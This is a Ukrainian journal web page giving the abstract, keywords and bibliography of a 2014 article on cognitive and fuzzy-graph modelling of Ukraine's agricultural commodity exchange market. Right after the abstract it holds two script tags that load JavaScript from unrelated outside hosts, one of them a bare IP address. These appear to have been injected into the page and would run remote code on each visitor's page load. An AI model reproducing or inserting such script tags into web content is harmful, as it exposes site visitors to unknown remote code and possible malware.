ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.341:176.72
Аграрний ринок

Когнітивне моделювання біржового ринку сільськогосподарської продукції / Горьовий В. П., Сидоренко О. В. // Економіка АПК. - 2014. - № 9 - С. 25

Проведено когнітивне моделювання біржового ринку сільськогосподарської продукції в Україні та його факторів впливу. Обґрунтовано і проаналізовано теоретичні та методологічні положення, прикладні рекомендації щодо моделювання системи за умов невизначеності та її слабкої структурованості. Визначено етапи побудови когнітивної карти за допомогою знакового орієнтованого графа та з використанням елементів нечіткої логіки. Наведено математичну формалізацію факторів впливу біржового ринку сільськогосподарської продукції України за допомогою побудови нечіткої когнітивної карти. Проведено кількісну та якісну оцінку причинно-наслідкових зв’язків між факторами-концептами. Визначено основні характерні показники когнітивної карти (консонанси впливу та взаємозв’язки між факторами-концептами впливу) і запропоновано їх економічну інтерпретацію. Окреслено можливі напрями та вказано на резерви для пошуку управлінських рішень щодо створення умов для розвитку БРСГП при невизначеності. Табл.: 3. Рис.: 2. Бібліогр.: 18.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: когнітивне моделювання, знаковий орієнтований граф, консонанс, причинно-наслідкові зв’язки, концепт, транзитивна матриця, біржовий ринок сільськогосподарської продукції

Список використаних джерел

 1. Бакурова А.В. Оцінка системних характеристик когнітивної моделі ціноутворення у сфері послуг / А. В. Бакурова, Д. В. Очеретін // Вісн. Запорізького нац. ун-ту. – 2011. – №2 (10). – С. 105–112.
 2. Бурчевський В.З. Когнітивне моделювання в стратегічному аналізі страхового бізнесу / В. З. Бурчевський / / Фінанси, облік і аудит. – 2010. – № 16 . – С. 208-213.
 3. Вергунова І.М. Системне моделювання в економіці: [блок 2]/ І.М. Вергунова – К.: ФОП Корзун Д.Ю, 2011. – 106 с.
 4. Горелова Г.В. Когнитивный анализ, синтез, прогнозирование развития больших систем в интеллектуальных РИУС / Г.В. Горелова, Э.В. Мельник, Я.С. Коровин // Искусственный интеллект. — 2010. — № 3. — С. 61—72.
 5. Евстегнеев Д. Использование когнитивных моделей при построении комплексной оценки состояния территории [Электронный ресурс] / Д. Евстегнеев, Т. Ледащева // Электронный научный журнал “Исследовано в России”. МФТИ. – Режим доступа: http://zhurnal.ape.relarn.ru/ articles/2003/135.pdf.
 6. Коврига С.В. Методические и аналитические основы когнитивного подхода к SWOT-анализу / С. В. Коврига // Проблемы управления. . – 2005. – № 5. − С. 58-63.
 7. Корноушенко Е.К. Управление процессами в cлабоформализованных средах при стабилизации графовых моделей среды/ Е.К. Корноушенко, В.И. Максимов // Труды ИПУ РАН. Вып. 2. – М., 1998. – С. 34-49.
 8. Кулинич А.А. Когнитивное моделирование в системах поддержки принятия решений / А. А. Кулинич // Междунар. конф. по проблемам управления. – Т. 3. – М.: ИПУ РАН, 1999. – С. 56-68.
 9. Прангишвили И.В. О методах аффективного управления сложными системами / И.В. Прангишвили // Труды 5-й междунар. конф. "Когнитивный анализ и управление развитием ситуаций" (CASC'2005) / ИПУ РАН. М., 2005. – С. 7-15.
 10. Прохорова В.В. Науково-методичні аспекти розробки когнітивного підходу щодо моделювання управлінських впливів на розвиток підприємства / В.В. Прохорова // Проблеми системного підходу в економіці [Електронне наукове видання]. – 2011. – № 1. – Режим доступу до журн.: http://www.nbuv.gov.ua/e -journals/PSPE/index.htm.
 11. Силов В.Б. Принятие стратегических решений в нечеткой обстановке / В.Б. Силов. − М.: ИНПРО—РЕС, 1995. — 228 с.
 12. Складанний Д.М. Когнітивне моделювання процесів публічно-приватного партнерства в регіонах України / Д.М. Складанний, В.Ф. Тищенко // Проблеми економіки. – 2013. – № 2. – С.288-297.
 13. Шемаев В.Н. Обобщенные оценки факторов в задачах когнитивного моделирования / Т. А. Таран, В.Н. Шемаев // Математичні машини і системи. – 2004. – № 3. – С. 111–124.
 14. Axelrod R. The Structure of Decision: Cognitive Maps of Political Elites. – Princeton. University Press, 1976.
 15. Yaman D., Polat S. A fuzzy cognitive map approach for effect-based operations: An illustrative case // Information Sciences. – № 179. – 2009. – P.382–403.
 16. Kosko B. Fuzzy cognitive Maps / B. Kosko // International journal of Man. – Machine Studies. – 1986. – № 24. – P. 65–75.
 17. Roberts F. Graph Theory and its Applications to Problems of Society, Society for Industrial and Applied Mathematics. - Philadelphia, 1978.
 18. Smarandache F. Fuzzy cognitive maps and neutrosophic cognitive maps [електронний ресурс] // Florentin Smarandache, W. B. Vasantha Kandasamy – Доступ до ресурсу - http://arxiv.org/ftp/math/papers/0311/0311063.pdf.
Читати статтю: 14_09_25-32.pdf
Читати переклад статті: 1409horovyi_sydorenko.pdf